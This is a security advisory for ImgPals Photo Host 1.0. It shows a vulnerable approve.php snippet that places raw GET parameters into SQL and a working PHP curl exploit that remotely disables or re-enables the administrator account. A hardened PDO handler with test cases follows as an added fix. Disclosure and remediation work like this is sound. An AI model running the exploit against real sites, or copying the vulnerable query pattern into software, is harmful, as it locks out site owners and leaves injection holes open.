ImgPals Photo Host 1.0 Stable Admin Account Deactivation

2012-02-29 / 2012-09-17
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

-=[--------------------ADVISORY-------------------]=-

ImgPals Photo Host Version 1.0 STABLE

Author: Corrado Liotta Aka CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-

-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Deactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

...::[ Description ]::..

I released the ImgPals Photo Host Version 1.0 STABLE

Features Include:

* Easy Install
* Full README file included
* Full Control Panel to control your site
* User Side Features
  o Multiple JQuery Uploads
  o Create and Edit Photo Albums
  o Make Albums Public or Private
  o Describe Albums and Photos
  o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
  o Add Friends
  o Chat with Friends
  o Update people with status wall posting
  o Manage Profile
  o Profile Avatar Uploads
  o Private Messaging
* And much more, be sure to check out the Demo

...::[ Bug ]::..

An attacker can remotely disable the administrator account, preventing the administrator from accessing the site.

...::[ Proof Of Concept ]::..

if ($_GET['a'] == 'app0'){
$sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'");

By sending the command approve.php?u=1&a=app0 an attacker can disable the Administrator account.

...::[ Exploit ]::..
#!/usr/bin/php -f
<?php
//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on
$target = $argv[1];
$power = $argv[2];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
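
The approve.php excerpt in the proof of concept changes account state from GET parameters that are placed directly into the SQL string. The handler below is an added example of the checks a fix needs, not ImgPals code and not part of the original advisory. The session keys (is_admin, csrf_token), the POST field names and the in-memory SQLite database are assumptions; the members table, the approved column and the app0/app1 actions come from the advisory.

```php
<?php
// Added example, not ImgPals code. Session keys, the csrf_token field and the
// SQLite demo database are assumptions; table and column names are the advisory's.
function set_member_approval(PDO $db, array $session, string $method, array $post): int
{
    // State changes must not ride on GET (links, image tags, prefetchers).
    if ($method !== 'POST') {
        return 405;
    }
    // Only an authenticated administrator may change approval state.
    if (empty($session['is_admin'])) {
        return 403;
    }
    // Tie the request to the administrator's session (anti-CSRF token).
    $token = $post['csrf_token'] ?? '';
    if (!is_string($token) || empty($session['csrf_token'])
        || !hash_equals($session['csrf_token'], $token)) {
        return 403;
    }
    // Allow-list the action and require a positive integer member id.
    $actions = ['app0' => 0, 'app1' => 1];
    $action = $post['a'] ?? '';
    $id = filter_var($post['u'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if (!is_string($action) || !isset($actions[$action]) || $id === false) {
        return 400;
    }
    // Parameterized query: request data never becomes part of the SQL text.
    $stmt = $db->prepare('UPDATE members SET approved = :approved WHERE id = :id');
    $stmt->execute([':approved' => $actions[$action], ':id' => $id]);
    return 200;
}

// Constructed demo data: in-memory SQLite stands in for the MySQL backend.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, approved INTEGER)');
$db->exec('INSERT INTO members (id, approved) VALUES (1, 1)');
$admin = ['is_admin' => true, 'csrf_token' => bin2hex(random_bytes(16))];
$valid = ['u' => '1', 'a' => 'app0', 'csrf_token' => $admin['csrf_token']];
$cases = [
    'anonymous GET (request from the advisory)' => [[], 'GET', ['u' => '1', 'a' => 'app0']],
    'anonymous POST' => [[], 'POST', ['u' => '1', 'a' => 'app0']],
    'admin POST without token' => [$admin, 'POST', ['u' => '1', 'a' => 'app0']],
    'admin POST with non-integer id' => [$admin, 'POST', ['u' => '1abc'] + $valid],
    'admin POST, valid request' => [$admin, 'POST', $valid],
];
foreach ($cases as $label => [$session, $method, $post]) {
    printf("%-42s -> %d\n", $label, set_member_approval($db, $session, $method, $post));
}
```

Run it with the PHP CLI (pdo_sqlite enabled); only the last case reaches the UPDATE statement.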


